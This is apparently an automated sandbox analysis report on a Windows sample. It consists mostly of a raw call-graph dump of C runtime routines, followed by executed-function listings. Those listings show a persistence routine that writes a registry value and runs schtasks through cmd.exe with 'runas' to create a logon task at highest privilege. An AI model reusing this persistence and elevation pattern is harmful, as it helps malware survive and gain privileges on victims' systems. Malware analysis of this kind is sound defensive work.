11954 40f0c8 11953->11954 11957 40f0d0 11954->11957 11958 40f0e1 11954->11958 11959 40d79d CallUnexpected 39 API calls 11955->11959 11956->10763 11960 411430 _unexpected 6 API calls 11957->11960 11961 411430 _unexpected 6 API calls 11958->11961 11962 40f135 11959->11962 11963 40f0de 11960->11963 11964 40f0ed 11961->11964 11967 40dc45 __freea 14 API calls 11963->11967 11965 40f0f1 11964->11965 11966 40f108 11964->11966 11969 411430 _unexpected 6 API calls 11965->11969 11968 40eea9 _unexpected 14 API calls 11966->11968 11967->11951 11970 40f113 11968->11970 11969->11963 11971 40dc45 __freea 14 API calls 11970->11971 11971->11951 11973 40cf53 11972->11973 11982 40cf64 11972->11982 11974 4079cf CallUnexpected GetModuleHandleW 11973->11974 11977 40cf58 11974->11977 11977->11982 11983 40d007 GetModuleHandleExW 11977->11983 11978 40cfa2 11978->10722 11988 40cdf1 11982->11988 11984 40d046 GetProcAddress 11983->11984 11985 40d05a 11983->11985 11984->11985 11986 40d076 11985->11986 11987 40d06d FreeLibrary 11985->11987 11986->11982 11987->11986 11989 40cdfd ___scrt_is_nonwritable_in_current_image 11988->11989 12003 40f599 EnterCriticalSection 11989->12003 11991 40ce07 12004 40ce3e 11991->12004 11993 40ce14 12008 40ce32 11993->12008 11996 40cfbd 12033 40cfee 11996->12033 11998 40cfc7 11999 40cfdb 11998->11999 12000 40cfcb GetCurrentProcess TerminateProcess 11998->12000 12001 40d007 CallUnexpected 3 API calls 11999->12001 12000->11999 12002 40cfe3 ExitProcess 12001->12002 12003->11991 12006 40ce4a ___scrt_is_nonwritable_in_current_image CallUnexpected 12004->12006 12005 40ceae CallUnexpected 12005->11993 12006->12005 12011 40d52b 12006->12011 12032 40f5e1 LeaveCriticalSection 12008->12032 12010 40ce20 12010->11978 12010->11996 12012 40d537 __EH_prolog3 12011->12012 12015 40d283 12012->12015 12014 40d55e CallUnexpected 12014->12005 12016 40d28f ___scrt_is_nonwritable_in_current_image 12015->12016 12023 40f599 EnterCriticalSection 12016->12023 12018 40d29d 12024 40d43b 12018->12024 12023->12018 12025 40d2aa 12024->12025 12026 40d45a 12024->12026 12028 40d2d2 12025->12028 12026->12025 12027 40dc45 __freea 14 API calls 12026->12027 12027->12025 12031 40f5e1 LeaveCriticalSection 12028->12031 12030 40d2bb 12030->12014 12031->12030 12032->12010 12036 41076a 12033->12036 12035 40cff3 CallUnexpected 12035->11998 12037 410779 CallUnexpected 12036->12037 12038 410786 12037->12038 12040 411333 12037->12040 12038->12035 12041 4112ae _unexpected 5 API calls 12040->12041 12042 41134f 12041->12042 12042->12038 12044 40d6dd 12043->12044 12046 40d6ef ___scrt_uninitialize_crt 12043->12046 12045 40d6eb 12044->12045 12048 411c66 12044->12048 12045->10774 12046->10774 12051 411af7 12048->12051 12054 411a4b 12051->12054 12055 411a57 ___scrt_is_nonwritable_in_current_image 12054->12055 12062 40f599 EnterCriticalSection 12055->12062 12057 411a61 ___scrt_uninitialize_crt 12058 411acd 12057->12058 12063 4119bf 12057->12063 12071 411aeb 12058->12071 12062->12057 12064 4119cb ___scrt_is_nonwritable_in_current_image 12063->12064 12074 40ed00 EnterCriticalSection 12064->12074 12066 411a21 12088 411a3f 12066->12088 12067 4119d5 ___scrt_uninitialize_crt 12067->12066 12075 411c01 12067->12075 12190 40f5e1 LeaveCriticalSection 12071->12190 12073 411ad9 12073->12045 12074->12067 12076 411c16 ___std_exception_copy 12075->12076 12077 411c28 12076->12077 12078 411c1d 12076->12078 12091 411b98 12077->12091 12079 411af7 ___scrt_uninitialize_crt 70 API calls 12078->12079 12081 411c23 12079->12081 12083 40b4a0 ___std_exception_copy 41 API calls 12081->12083 12084 411c60 12083->12084 12084->12066 12086 411c49 12104 414a20 12086->12104 12189 40ed14 LeaveCriticalSection 12088->12189 12090 411a2d 12090->12057 12092 411bb1 12091->12092 12096 411bd8 12091->12096 12093 40ebc5 ___scrt_uninitialize_crt 41 API calls 12092->12093 12092->12096 12094 411bcd 12093->12094 12115 41523f 12094->12115 12096->12081 12097 40ebc5 12096->12097 12098 40ebd1 12097->12098 12099 40ebe6 12097->12099 12100 40dc32 ___std_exception_copy 14 API calls 12098->12100 12099->12086 12101 40ebd6 12100->12101 12102 40db74 ___std_exception_copy 41 API calls 12101->12102 12103 40ebe1 12102->12103 12103->12086 12105 414a31 12104->12105 12107 414a3e 12104->12107 12106 40dc32 ___std_exception_copy 14 API calls 12105->12106 12114 414a36 12106->12114 12108 414a87 12107->12108 12111 414a65 12107->12111 12109 40dc32 ___std_exception_copy 14 API calls 12108->12109 12110 414a8c 12109->12110 12112 40db74 ___std_exception_copy 41 API calls 12110->12112 12156 41497e 12111->12156 12112->12114 12114->12081 12117 41524b ___scrt_is_nonwritable_in_current_image 12115->12117 12116 415253 12116->12096 12117->12116 12118 41528c 12117->12118 12120 4152d2 12117->12120 12119 40daf7 ___std_exception_copy 29 API calls 12118->12119 12119->12116 12126 4108df EnterCriticalSection 12120->12126 12122 4152d8 12123 4152f6 12122->12123 12127 415350 12122->12127 12153 415348 12123->12153 12126->12122 12128 415378 12127->12128 12152 41539b ___scrt_uninitialize_crt 12127->12152 12129 41537c 12128->12129 12131 4153d7 12128->12131 12130 40daf7 ___std_exception_copy 29 API calls 12129->12130 12130->12152 12132 4153f5 12131->12132 12133 4162c8 ___scrt_uninitialize_crt 43 API calls 12131->12133 12134 414ecc ___scrt_uninitialize_crt 42 API calls 12132->12134 12133->12132 12135 415407 12134->12135 12136 415454 12135->12136 12137 41540d 12135->12137 12138 415468 12136->12138 12139 4154bd WriteFile 12136->12139 12140 415415 12137->12140 12141 41543c 12137->12141 12144 415470 12138->12144 12145 4154a9 12138->12145 12142 4154df GetLastError 12139->12142 12139->12152 12148 414e64 ___scrt_uninitialize_crt 6 API calls 12140->12148 12140->12152 12143 414a9d ___scrt_uninitialize_crt 47 API calls 12141->12143 12142->12152 12143->12152 12146 415495 12144->12146 12147 415475 12144->12147 12149 414f49 ___scrt_uninitialize_crt 7 API calls 12145->12149 12150 41510d ___scrt_uninitialize_crt 8 API calls 12146->12150 12151 415024 ___scrt_uninitialize_crt 7 API calls 12147->12151 12147->12152 12148->12152 12149->12152 12150->12152 12151->12152 12152->12123 12154 410902 ___scrt_uninitialize_crt LeaveCriticalSection 12153->12154 12155 41534e 12154->12155 12155->12116 12157 41498a ___scrt_is_nonwritable_in_current_image 12156->12157 12169 4108df EnterCriticalSection 12157->12169 12159 414999 12167 4149de 12159->12167 12170 4109b6 12159->12170 12160 40dc32 ___std_exception_copy 14 API calls 12162 4149e5 12160->12162 12186 414a14 12162->12186 12163 4149c5 FlushFileBuffers 12163->12162 12164 4149d1 GetLastError 12163->12164 12183 40dc1f 12164->12183 12167->12160 12169->12159 12171 4109c3 12170->12171 12172 4109d8 12170->12172 12173 40dc1f ___scrt_uninitialize_crt 14 API calls 12171->12173 12175 40dc1f ___scrt_uninitialize_crt 14 API calls 12172->12175 12177 4109fd 12172->12177 12174 4109c8 12173->12174 12176 40dc32 ___std_exception_copy 14 API calls 12174->12176 12178 410a08 12175->12178 12179 4109d0 12176->12179 12177->12163 12180 40dc32 ___std_exception_copy 14 API calls 12178->12180 12179->12163 12181 410a10 12180->12181 12182 40db74 ___std_exception_copy 41 API calls 12181->12182 12182->12179 12184 40f1cc ___std_exception_copy 14 API calls 12183->12184 12185 40dc24 12184->12185 12185->12167 12187 410902 ___scrt_uninitialize_crt LeaveCriticalSection 12186->12187 12188 4149fd 12187->12188 12188->12114 12189->12090 12190->12073 12351 414808 12354 410208 12351->12354 12355 410211 12354->12355 12359 410243 12354->12359 12360 40f136 12355->12360 12361 40f141 12360->12361 12362 40f147 12360->12362 12364 4113f1 _unexpected 6 API calls 12361->12364 12363 411430 _unexpected 6 API calls 12362->12363 12366 40f14d 12362->12366 12365 40f161 12363->12365 12364->12362 12365->12366 12367 40d8f2 _unexpected 14 API calls 12365->12367 12368 40d79d CallUnexpected 41 API calls 12366->12368 12369 40f152 12366->12369 12370 40f171 12367->12370 12371 40f1cb 12368->12371 12385 410013 12369->12385 12372 40f179 12370->12372 12373 40f18e 12370->12373 12374 411430 _unexpected 6 API calls 12372->12374 12375 411430 _unexpected 6 API calls 12373->12375 12376 40f185 12374->12376 12377 40f19a 12375->12377 12381 40dc45 __freea 14 API calls 12376->12381 12378 40f1ad 12377->12378 12379 40f19e 12377->12379 12380 40eea9 _unexpected 14 API calls 12378->12380 12382 411430 _unexpected 6 API calls 12379->12382 12383 40f1b8 12380->12383 12381->12366 12382->12376 12384 40dc45 __freea 14 API calls 12383->12384 12384->12369 12408 410168 12385->12408 12392 41007d 12433 410263 12392->12433 12393 41006f 12394 40dc45 __freea 14 API calls 12393->12394 12396 410056 12394->12396 12396->12359 12398 4100b5 12399 40dc32 ___std_exception_copy 14 API calls 12398->12399 12401 4100ba 12399->12401 12400 4100fc 12404 410145 12400->12404 12444 40fc8c 12400->12444 12402 40dc45 __freea 14 API calls 12401->12402 12402->12396 12403 4100d0 12403->12400 12406 40dc45 __freea 14 API calls 12403->12406 12405 40dc45 __freea 14 API calls 12404->12405 12405->12396 12406->12400 12409 410174 ___scrt_is_nonwritable_in_current_image 12408->12409 12411 41018e 12409->12411 12452 40f599 EnterCriticalSection 12409->12452 12412 41003d 12411->12412 12415 40d79d CallUnexpected 41 API calls 12411->12415 12419 40fd9a 12412->12419 12413 4101ca 12453 4101e7 12413->12453 12417 410207 12415->12417 12416 41019e 12416->12413 12418 40dc45 __freea 14 API calls 12416->12418 12418->12413 12457 40fb2f 12419->12457 12422 40fdbb GetOEMCP 12424 40fde4 12422->12424 12423 40fdcd 12423->12424 12425 40fdd2 GetACP 12423->12425 12424->12396 12426 40dc7f 12424->12426 12425->12424 12427 40dcbd 12426->12427 12431 40dc8d _unexpected 12426->12431 12428 40dc32 ___std_exception_copy 14 API calls 12427->12428 12430 40dcbb 12428->12430 12429 40dca8 RtlAllocateHeap 12429->12430 12429->12431 12430->12392 12430->12393 12431->12427 12431->12429 12432 40c57b _unexpected 2 API calls 12431->12432 12432->12431 12434 40fd9a 43 API calls 12433->12434 12435 410283 12434->12435 12436 410388 12435->12436 12438 4102c0 IsValidCodePage 12435->12438 12443 4102db CallUnexpected 12435->12443 12437 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12436->12437 12440 4100aa 12437->12440 12438->12436 12439 4102d2 12438->12439 12441 4102fb GetCPInfo 12439->12441 12439->12443 12440->12398 12440->12403 12441->12436 12441->12443 12610 40fe6e 12443->12610 12445 40fc98 ___scrt_is_nonwritable_in_current_image 12444->12445 12691 40f599 EnterCriticalSection 12445->12691 12447 40fca2 12692 40fcd9 12447->12692 12452->12416 12456 40f5e1 LeaveCriticalSection 12453->12456 12455 4101ee 12455->12411 12456->12455 12458 40fb46 12457->12458 12459 40fb4d 12457->12459 12458->12422 12458->12423 12459->12458 12460 40f07b _unexpected 41 API calls 12459->12460 12461 40fb6e 12460->12461 12465 40de7d 12461->12465 12466 40de90 12465->12466 12468 40dea5 12465->12468 12466->12468 12473 4110de 12466->12473 12469 40dedb 12468->12469 12470 40df03 12469->12470 12471 40deee 12469->12471 12470->12458 12471->12470 12605 410250 12471->12605 12474 4110ea ___scrt_is_nonwritable_in_current_image 12473->12474 12475 40f07b _unexpected 41 API calls 12474->12475 12476 4110f3 12475->12476 12477 411139 12476->12477 12486 40f599 EnterCriticalSection 12476->12486 12477->12468 12479 411111 12487 41115f 12479->12487 12484 40d79d CallUnexpected 41 API calls 12485 41115e 12484->12485 12486->12479 12488 411122 12487->12488 12489 41116d _unexpected 12487->12489 12491 41113e 12488->12491 12489->12488 12494 410e92 12489->12494 12604 40f5e1 LeaveCriticalSection 12491->12604 12493 411135 12493->12477 12493->12484 12496 410f12 12494->12496 12497 410ea8 12494->12497 12498 40dc45 __freea 14 API calls 12496->12498 12521 410f60 12496->12521 12497->12496 12502 40dc45 __freea 14 API calls 12497->12502 12504 410edb 12497->12504 12499 410f34 12498->12499 12500 40dc45 __freea 14 API calls 12499->12500 12505 410f47 12500->12505 12501 40dc45 __freea 14 API calls 12508 410f07 12501->12508 12510 410ed0 12502->12510 12503 410f6e 12509 410fce 12503->12509 12518 40dc45 14 API calls __freea 12503->12518 12506 40dc45 __freea 14 API calls 12504->12506 12520 410efd 12504->12520 12507 40dc45 __freea 14 API calls 12505->12507 12511 410ef2 12506->12511 12512 410f55 12507->12512 12513 40dc45 __freea 14 API calls 12508->12513 12514 40dc45 __freea 14 API calls 12509->12514 12522 410a36 12510->12522 12550 410b34 12511->12550 12517 40dc45 __freea 14 API calls 12512->12517 12513->12496 12519 410fd4 12514->12519 12517->12521 12518->12503 12519->12488 12520->12501 12562 411003 12521->12562 12523 410a47 12522->12523 12549 410b30 12522->12549 12524 410a58 12523->12524 12525 40dc45 __freea 14 API calls 12523->12525 12526 410a6a 12524->12526 12528 40dc45 __freea 14 API calls 12524->12528 12525->12524 12527 410a7c 12526->12527 12529 40dc45 __freea 14 API calls 12526->12529 12530 410a8e 12527->12530 12531 40dc45 __freea 14 API calls 12527->12531 12528->12526 12529->12527 12532 40dc45 __freea 14 API calls 12530->12532 12534 410aa0 12530->12534 12531->12530 12532->12534 12533 410ab2 12535 410ac4 12533->12535 12537 40dc45 __freea 14 API calls 12533->12537 12534->12533 12536 40dc45 __freea 14 API calls 12534->12536 12538 410ad6 12535->12538 12539 40dc45 __freea 14 API calls 12535->12539 12536->12533 12537->12535 12540 410ae8 12538->12540 12541 40dc45 __freea 14 API calls 12538->12541 12539->12538 12542 410afa 12540->12542 12544 40dc45 __freea 14 API calls 12540->12544 12541->12540 12543 410b0c 12542->12543 12545 40dc45 __freea 14 API calls 12542->12545 12546 410b1e 12543->12546 12547 40dc45 __freea 14 API calls 12543->12547 12544->12542 12545->12543 12548 40dc45 __freea 14 API calls 12546->12548 12546->12549 12547->12546 12548->12549 12549->12504 12551 410b41 12550->12551 12561 410b99 12550->12561 12552 410b51 12551->12552 12553 40dc45 __freea 14 API calls 12551->12553 12554 410b63 12552->12554 12555 40dc45 __freea 14 API calls 12552->12555 12553->12552 12556 40dc45 __freea 14 API calls 12554->12556 12559 410b75 12554->12559 12555->12554 12556->12559 12557 40dc45 __freea 14 API calls 12558 410b87 12557->12558 12560 40dc45 __freea 14 API calls 12558->12560 12558->12561 12559->12557 12559->12558 12560->12561 12561->12520 12563 41102f 12562->12563 12564 411010 12562->12564 12563->12503 12564->12563 12568 410bc2 12564->12568 12567 40dc45 __freea 14 API calls 12567->12563 12569 410ca0 12568->12569 12570 410bd3 12568->12570 12569->12567 12571 410b9d _unexpected 14 API calls 12570->12571 12572 410bdb 12571->12572 12573 410b9d _unexpected 14 API calls 12572->12573 12574 410be6 12573->12574 12575 410b9d _unexpected 14 API calls 12574->12575 12576 410bf1 12575->12576 12577 410b9d _unexpected 14 API calls 12576->12577 12578 410bfc 12577->12578 12579 410b9d _unexpected 14 API calls 12578->12579 12580 410c0a 12579->12580 12581 40dc45 __freea 14 API calls 12580->12581 12582 410c15 12581->12582 12583 40dc45 __freea 14 API calls 12582->12583 12584 410c20 12583->12584 12585 40dc45 __freea 14 API calls 12584->12585 12586 410c2b 12585->12586 12587 410b9d _unexpected 14 API calls 12586->12587 12588 410c39 12587->12588 12589 410b9d _unexpected 14 API calls 12588->12589 12590 410c47 12589->12590 12591 410b9d _unexpected 14 API calls 12590->12591 12592 410c58 12591->12592 12593 410b9d _unexpected 14 API calls 12592->12593 12594 410c66 12593->12594 12595 410b9d _unexpected 14 API calls 12594->12595 12596 410c74 12595->12596 12597 40dc45 __freea 14 API calls 12596->12597 12598 410c7f 12597->12598 12599 40dc45 __freea 14 API calls 12598->12599 12600 410c8a 12599->12600 12601 40dc45 __freea 14 API calls 12600->12601 12602 410c95 12601->12602 12603 40dc45 __freea 14 API calls 12602->12603 12603->12569 12604->12493 12606 40f07b _unexpected 41 API calls 12605->12606 12607 410255 12606->12607 12608 410168 ___scrt_uninitialize_crt 41 API calls 12607->12608 12609 410260 12608->12609 12609->12470 12611 40fe96 GetCPInfo 12610->12611 12612 40ff5f 12610->12612 12611->12612 12613 40feae 12611->12613 12614 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12612->12614 12621 410cf4 12613->12621 12616 410011 12614->12616 12616->12436 12620 4147bf 45 API calls 12620->12612 12622 40fb2f 41 API calls 12621->12622 12623 410d14 12622->12623 12624 41059a ___scrt_uninitialize_crt MultiByteToWideChar 12623->12624 12627 410d41 12624->12627 12625 410dd0 12628 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12625->12628 12626 410dc8 12641 410df5 12626->12641 12627->12625 12627->12626 12630 40dc7f 15 API calls 12627->12630 12632 410d66 CallUnexpected __alloca_probe_16 12627->12632 12631 40ff16 12628->12631 12630->12632 12636 4147bf 12631->12636 12632->12626 12633 41059a ___scrt_uninitialize_crt MultiByteToWideChar 12632->12633 12634 410daf 12633->12634 12634->12626 12635 410db6 GetStringTypeW 12634->12635 12635->12626 12637 40fb2f 41 API calls 12636->12637 12638 4147d2 12637->12638 12645 4145d0 12638->12645 12642 410e01 12641->12642 12643 410e12 12641->12643 12642->12643 12644 40dc45 __freea 14 API calls 12642->12644 12643->12625 12644->12643 12646 4145eb 12645->12646 12647 41059a ___scrt_uninitialize_crt MultiByteToWideChar 12646->12647 12651 41462f 12647->12651 12648 406f60 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12649 40ff37 12648->12649 12649->12620 12650 414655 __alloca_probe_16 12653 4146fd 12650->12653 12656 41059a ___scrt_uninitialize_crt MultiByteToWideChar 12650->12656 12651->12650 12652 40dc7f 15 API calls 12651->12652 12651->12653 12655 4147aa 12651->12655 12652->12650 12654 410df5 __freea 14 API calls 12653->12654 12654->12655 12655->12648 12657 41469e 12656->12657 12657->12653 12673 4114bd 12657->12673 12660 4146d4 12660->12653 12665 4114bd 6 API calls 12660->12665 12661 41470c 12662 414795 12661->12662 12663 40dc7f 15 API calls 12661->12663 12666 41471e __alloca_probe_16 12661->12666 12664 410df5 __freea 14 API calls 12662->12664 12663->12666 12664->12653 12665->12653 12666->12662 12667 4114bd 6 API calls 12666->12667 12668 414761 12667->12668 12668->12662 12679 410654 12668->12679 12670 41477b 12670->12662 12671 414784 12670->12671 12672 410df5 __freea 14 API calls 12671->12672 12672->12653 12682 4111af 12673->12682 12677 41150e LCMapStringW 12678 4114ce 12677->12678 12678->12653 12678->12660 12678->12661 12680 410667 ___scrt_uninitialize_crt 12679->12680 12681 4106a5 WideCharToMultiByte 12680->12681 12681->12670 12683 4112ae _unexpected 5 API calls 12682->12683 12684 4111c5 12683->12684 12684->12678 12685 41151a 12684->12685 12688 4111c9 12685->12688 12687 411525 12687->12677 12689 4112ae _unexpected 5 API calls 12688->12689 12690 4111df 12689->12690 12690->12687 12691->12447 12702 410468 12692->12702 12694 40fcfb 12695 410468 41 API calls 12694->12695 12696 40fd1a 12695->12696 12697 40fcaf 12696->12697 12698 40dc45 __freea 14 API calls 12696->12698 12699 40fccd 12697->12699 12698->12697 12716 40f5e1 LeaveCriticalSection 12699->12716 12701 40fcbb 12701->12404 12703 410479 12702->12703 12706 410475 __InternalCxxFrameHandler 12702->12706 12704 410480 12703->12704 12708 410493 CallUnexpected 12703->12708 12705 40dc32 ___std_exception_copy 14 API calls 12704->12705 12707 410485 12705->12707 12706->12694 12709 40db74 ___std_exception_copy 41 API calls 12707->12709 12708->12706 12710 4104c1 12708->12710 12711 4104ca 12708->12711 12709->12706 12712 40dc32 ___std_exception_copy 14 API calls 12710->12712 12711->12706 12714 40dc32 ___std_exception_copy 14 API calls 12711->12714 12713 4104c6 12712->12713 12715 40db74 ___std_exception_copy 41 API calls 12713->12715 12714->12713 12715->12706 12716->12701 13028 40ecb4 13029 411c66 ___scrt_uninitialize_crt 70 API calls 13028->13029 13030 40ecbc 13029->13030 13038 413f57 13030->13038 13032 40ecc1 13048 414002 13032->13048 13035 40eceb 13036 40dc45 __freea 14 API calls 13035->13036 13037 40ecf6 13036->13037 13039 413f63 ___scrt_is_nonwritable_in_current_image 13038->13039 13052 40f599 EnterCriticalSection 13039->13052 13041 413fda 13059 413ff9 13041->13059 13043 413f6e 13043->13041 13045 413fae DeleteCriticalSection 13043->13045 13053 416215 13043->13053 13046 40dc45 __freea 14 API calls 13045->13046 13046->13043 13049 414019 13048->13049 13051 40ecd0 DeleteCriticalSection 13048->13051 13050 40dc45 __freea 14 API calls 13049->13050 13049->13051 13050->13051 13051->13032 13051->13035 13052->13043 13054 416228 ___std_exception_copy 13053->13054 13062 4160f0 13054->13062 13056 416234 13057 40b4a0 ___std_exception_copy 41 API calls 13056->13057 13058 416240 13057->13058 13058->13043 13134 40f5e1 LeaveCriticalSection 13059->13134 13061 413fe6 13061->13032 13063 4160fc ___scrt_is_nonwritable_in_current_image 13062->13063 13064 416106 13063->13064 13065 416129 13063->13065 13066 40daf7 ___std_exception_copy 29 API calls 13064->13066 13067 416121 13065->13067 13073 40ed00 EnterCriticalSection 13065->13073 13066->13067 13067->13056 13069 416147 13074 416187 13069->13074 13071 416154 13088 41617f 13071->13088 13073->13069 13075 416194 13074->13075 13076 4161b7 13074->13076 13077 40daf7 ___std_exception_copy 29 API calls 13075->13077 13078 411b98 ___scrt_uninitialize_crt 66 API calls 13076->13078 13079 4161af 13076->13079 13077->13079 13080 4161cf 13078->13080 13079->13071 13081 414002 14 API calls 13080->13081 13082 4161d7 13081->13082 13083 40ebc5 ___scrt_uninitialize_crt 41 API calls 13082->13083 13084 4161e3 13083->13084 13091 416f76 13084->13091 13087 40dc45 __freea 14 API calls 13087->13079 13133 40ed14 LeaveCriticalSection 13088->13133 13090 416185 13090->13067 13092 416f9f 13091->13092 13095 4161ea 13091->13095 13093 416fee 13092->13093 13096 416fc6 13092->13096 13094 40daf7 ___std_exception_copy 29 API calls 13093->13094 13094->13095 13095->13079 13095->13087 13098 416ee5 13096->13098 13099 416ef1 ___scrt_is_nonwritable_in_current_image 13098->13099 13106 4108df EnterCriticalSection 13099->13106 13101 416f30 13120 416f6a 13101->13120 13102 416eff 13102->13101 13107 417019 13102->13107 13106->13102 13108 4109b6 ___scrt_uninitialize_crt 41 API calls 13107->13108 13111 417029 13108->13111 13109 41702f 13123 410925 13109->13123 13111->13109 13112 417061 13111->13112 13114 4109b6 ___scrt_uninitialize_crt 41 API calls 13111->13114 13112->13109 13113 4109b6 ___scrt_uninitialize_crt 41 API calls 13112->13113 13115 41706d CloseHandle 13113->13115 13116 417058 13114->13116 13115->13109 13117 417079 GetLastError 13115->13117 13118 4109b6 ___scrt_uninitialize_crt 41 API calls 13116->13118 13117->13109 13118->13112 13119 417087 ___scrt_uninitialize_crt 13119->13101 13132 410902 LeaveCriticalSection 13120->13132 13122 416f53 13122->13095 13124 410934 13123->13124 13125 41099b 13123->13125 13124->13125 13131 41095e 13124->13131 13126 40dc32 ___std_exception_copy 14 API calls 13125->13126 13127 4109a0 13126->13127 13128 40dc1f ___scrt_uninitialize_crt 14 API calls 13127->13128 13129 41098b 13128->13129 13129->13119 13130 410985 SetStdHandle 13130->13129 13131->13129 13131->13130 13132->13122 13133->13090 13134->13061 13583 4071b9 13584 4071c1 13583->13584 13600 40d108 13584->13600 13586 4071cc 13607 4075cf 13586->13607 13588 407884 4 API calls 13590 407263 13588->13590 13589 4071e1 __RTC_Initialize 13598 40723e 13589->13598 13613 40775c 13589->13613 13592 4071fa 13592->13598 13616 407816 InitializeSListHead 13592->13616 13594 407210 13617 407825 13594->13617 13596 407233 13623 40d1e5 13596->13623 13598->13588 13599 40725b 13598->13599 13601 40d13a 13600->13601 13602 40d117 13600->13602 13601->13586 13602->13601 13603 40dc32 ___std_exception_copy 14 API calls 13602->13603 13604 40d12a 13603->13604 13605 40db74 ___std_exception_copy 41 API calls 13604->13605 13606 40d135 13605->13606 13606->13586 13608 4075db 13607->13608 13609 4075df 13607->13609 13608->13589 13610 407884 4 API calls 13609->13610 13612 4075ec ___scrt_release_startup_lock 13609->13612 13611 407655 13610->13611 13612->13589 13630 40772f 13613->13630 13616->13594 13665 40d702 13617->13665 13619 407836 13620 40783d 13619->13620 13621 407884 4 API calls 13619->13621 13620->13596 13622 407845 13621->13622 13624 40f07b _unexpected 41 API calls 13623->13624 13625 40d1f0 13624->13625 13626 40d228 13625->13626 13627 40dc32 ___std_exception_copy 14 API calls 13625->13627 13626->13598 13628 40d21d 13627->13628 13629 40db74 ___std_exception_copy 41 API calls 13628->13629 13629->13626 13631 407745 13630->13631 13632 40773e 13630->13632 13639 40d592 13631->13639 13636 40d515 13632->13636 13635 407743 13635->13592 13637 40d592 44 API calls 13636->13637 13638 40d527 13637->13638 13638->13635 13642 40d2de 13639->13642 13643 40d2ea ___scrt_is_nonwritable_in_current_image 13642->13643 13650 40f599 EnterCriticalSection 13643->13650 13645 40d2f8 13651 40d339 13645->13651 13647 40d305 13661 40d32d 13647->13661 13650->13645 13652 40d354 13651->13652 13653 40d3c7 _unexpected 13651->13653 13652->13653 13654 40d3a7 13652->13654 13655 411595 44 API calls 13652->13655 13653->13647 13654->13653 13656 411595 44 API calls 13654->13656 13657 40d39d 13655->13657 13658 40d3bd 13656->13658 13659 40dc45 __freea 14 API calls 13657->13659 13660 40dc45 __freea 14 API calls 13658->13660 13659->13654 13660->13653 13664 40f5e1 LeaveCriticalSection 13661->13664 13663 40d316 13663->13635 13664->13663 13666 40d720 13665->13666 13670 40d740 13665->13670 13667 40dc32 ___std_exception_copy 14 API calls 13666->13667 13668 40d736 13667->13668 13669 40db74 ___std_exception_copy 41 API calls 13668->13669 13669->13670 13670->13619 13671 40d1be 13674 40d145 13671->13674 13675 40d151 ___scrt_is_nonwritable_in_current_image 13674->13675 13682 40f599 EnterCriticalSection 13675->13682 13677 40d15b 13678 40d189 13677->13678 13680 41115f ___scrt_uninitialize_crt 14 API calls 13677->13680 13683 40d1a7 13678->13683 13680->13677 13682->13677 13686 40f5e1 LeaveCriticalSection 13683->13686 13685 40d195 13686->13685

                                                                                                            Executed Functions

                                                                                                            Function 00401A80 Relevance: 96.8, APIs: 20, Strings: 35, Instructions: 535memoryregistrystringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00401E2D
                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 00401E34
                                                                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 00401E46
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401E4F
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A,7591F380,00000000,00000000), ref: 00401E73
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401E76
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00401E88
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00401EA3
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401EA6
                                                                                                            • wsprintfW.USER32 ref: 0040204E
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 0040205E
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00402061
                                                                                                            • wsprintfW.USER32 ref: 00402449
                                                                                                            • ShellExecuteW.SHELL32(00000000,runas,?,?,00000000,00000000), ref: 0040246A
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00402478
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040247B
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00402480
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402483
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0040248D
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402490
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree$wsprintf$CloseDirectoryExecuteOpenShellSystemValuelstrlen
                                                                                                            • String ID: "$#$#$$$$$%$%s\schtasks.exe$/c "%s"$/create /sc ONLOGON /tn "%s" /tr "%s" /RL HIGHEST$;$>$?$?$C$I$L$L$L$L$L$L$N$N$b$b$cmd.exe$i$invalid distance code$invalid literal/length code$l$need dictionary$p$runas$y$z
                                                                                                            • API String ID: 2564131513-3794329617
                                                                                                            • Opcode ID: 04f389ca7741c3945aa586c21f7cf16ee9636da73d18371d90bdc4e067ade90d
                                                                                                            • Instruction ID: c7f21fddc8ea59a5295c2fb286fd8e4a5c2df640abba276a52794d12d8862d0e
                                                                                                            • Opcode Fuzzy Hash: 04f389ca7741c3945aa586c21f7cf16ee9636da73d18371d90bdc4e067ade90d
                                                                                                            • Instruction Fuzzy Hash: DB42E168810369D9C720AFA2E8047FAB7F0FF2D745F419066E988EB560F3784985DB1D
                                                                                                            Function 00401420 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 294memorysleepprocessCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
